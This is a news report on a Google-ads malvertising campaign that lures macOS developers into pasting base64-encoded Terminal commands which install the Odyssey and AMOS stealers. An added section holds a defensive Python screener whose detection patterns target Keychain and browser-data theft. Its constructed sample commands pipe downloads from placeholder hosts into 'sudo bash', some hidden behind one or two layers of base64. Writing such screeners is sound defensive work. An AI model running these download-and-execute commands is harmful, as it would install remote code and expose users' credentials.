
Google Ads lead macOS developers to malware

A new wave of macOS attacks is targeting developers via fake download websites that look like legitimate platforms such as Homebrew, LogMeIn, and TradingView.

Researchers at Hunt.io discovered a network of more than 85 domains earlier this month. The network uses social engineering to convince users to install malware themselves.

The campaign spreads the Odyssey Stealer and AMOS (Atomic macOS Stealer) malware families. Both families focus on stealing system information, browser data, and crypto wallet login details. The attacks are carefully designed to exploit developers’ trust.

The fake Homebrew and TradingView sites display seemingly legitimate download portals with buttons such as “Copy command”. When a user clicks the button, a base64-encoded Terminal command is copied to the clipboard, so the user never sees what it actually does. That command downloads a shell script that bypasses macOS security measures and executes the malware.

Via Google Search to fake download sites

BleepingComputer discovered that traffic to several of these domains, including homebrewonline.org, tradingviewen.com, and filmoraus.com, was directed via paid ads on Google Search. This allowed the attackers to reach unsuspecting users who were simply looking for the official download pages. In some cases, the command was presented as a so-called security verification process, for example via a fake Cloudflare check.

Technical analysis shows that immediately after installation, the malware attempts to obtain administrator privileges via sudo, collects system information, and terminates processes such as OneDrive updates to hinder detection or recovery. Sensitive data such as browser cookies, Keychain information, and crypto wallets are then exfiltrated to the command-and-control server.
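The two passages above describe the same lure from both ends: a copied Terminal command that hides its real content behind base64, and a payload that escalates with sudo, kills processes and reaches for Keychain and browser data. Below is an added example of a pre-paste screener for such commands; it is not code from the article, Hunt.io or BleepingComputer. It peels base64 layers recursively (more than the single layer the article describes) and reports which indicators appear at which layer. The indicator patterns are illustrative ones written for this example, not published signatures; the sample commands are constructed, with placeholder hostnames rather than the campaign's domains; the only real URL is the genuine Homebrew one-liner from brew.sh, included to show that a plain download-and-execute is flagged for review, not blocked.

```python
import base64
import re
from dataclasses import dataclass, field

# Detection patterns for the shape of the lure: a base64 blob decoded and piped to a shell,
# a remote script fetched and executed, sudo, process termination, and access to Keychain
# or browser profile data. Illustrative patterns written for this example (assumption),
# not signatures published by the researchers.
INDICATORS = {
    "base64_to_shell": re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "remote_script_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "remote_script_subst": re.compile(r"(ba|z)?sh\s+-c\s+[\"']?\$\(\s*(curl|wget)\b"),
    "sudo": re.compile(r"\bsudo\b"),
    "kill_process": re.compile(r"\b(pkill|killall)\b"),
    "keychain_access": re.compile(r"security\s+(find-(generic|internet)-password|dump-keychain)|login\.keychain"),
    "browser_data": re.compile(r"Application Support/(Google/Chrome|Firefox|BraveSoftware)|/Cookies\b"),
}
# Indicators that warrant blocking even when they appear in plain, unencoded text.
HIGH_SEVERITY = {"base64_to_shell", "keychain_access", "browser_data"}

# A run of 16+ base64 alphabet characters with optional padding is worth trying to decode.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


@dataclass
class Verdict:
    verdict: str                                        # "ok", "review" or "block"
    hits: list = field(default_factory=list)            # (indicator name, layer depth)
    decoded_layers: list = field(default_factory=list)  # text recovered from base64 blobs


def _layers(text, depth=0, max_depth=3):
    """Yield (depth, text) for the command and for every printable base64 blob inside it,
    recursively, so a command hidden behind several encoding layers is still inspected."""
    yield depth, text
    if depth >= max_depth:
        return
    for match in B64_TOKEN.finditer(text):
        try:
            decoded = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64 after all (e.g. a long hostname) or not text
        if not decoded.strip() or not all(c.isprintable() or c in "\n\t" for c in decoded):
            continue
        yield from _layers(decoded, depth + 1, max_depth)


def screen_command(cmd, max_depth=3):
    """Screen a command a user is about to paste into Terminal.

    "block":  obfuscation, any indicator inside a decoded layer, or Keychain/browser access;
    "review": a plain download-and-execute, sudo or process kill in clear text;
    "ok":     nothing matched (not a clean bill of health, only no known pattern).
    """
    hits, decoded = [], []
    for depth, text in _layers(cmd, 0, max_depth):
        if depth:
            decoded.append(text)
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.append((name, depth))
    if any(name in HIGH_SEVERITY or depth > 0 for name, depth in hits):
        verdict = "block"
    elif hits:
        verdict = "review"
    else:
        verdict = "ok"
    return Verdict(verdict, hits, decoded)


def _b64(s):
    return base64.b64encode(s.encode()).decode()


# Constructed sample clipboard contents; *.example.invalid hosts are placeholders.
_stage = "curl -fsSL https://installer.example.invalid/setup.sh | sudo bash"
_inner = _b64("curl -fsSL https://cdn.example.invalid/p.sh | sudo sh")
_outer = _b64(f"echo '{_inner}' | base64 -D | zsh")
SAMPLES = {
    # the lure in the article: a "Copy command" button hands over a base64 blob
    "obfuscated_installer": f'echo "{_b64(_stage)}" | base64 -d | bash',
    # the same technique with two encoding layers
    "double_encoded": f"printf '%s' '{_outer}' | base64 -D | sh",
    # the genuine Homebrew one-liner from brew.sh: download-and-execute, nothing hidden
    "plain_install_oneliner": '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
    "benign": "brew install wget",
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        result = screen_command(cmd)
        print(f"{label:24} {result.verdict:7} {result.hits}")
```

The decision rule is deliberately asymmetric: a download-and-execute in clear text is the same shape as the genuine Homebrew installer, so it only earns “review” and the user still has to confirm the host; anything that needed base64 to reach the clipboard, or that touches Keychain or browser profiles, is blocked outright, because a legitimate install command has no reason to hide.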

The infrastructure behind the campaign consists of reused servers and SSL certificates dating back to 2023. It is noteworthy that the servers are not registered to organizations, but to individual names, indicating a long-term, semi-professional operation. The combination of infrastructure reuse, convincing fake sites, and now malvertising shows that the attackers are constantly expanding and refining their tactics.

The use of paid advertisements marks the next phase in the evolution of macOS malware campaigns. Whereas attackers previously relied on phishing links or social media, they now use search engine advertising to distribute malware through a channel that looks legitimate. The campaign remains active, and both Hunt.io and BleepingComputer expect the infrastructure to be modified further to evade detection.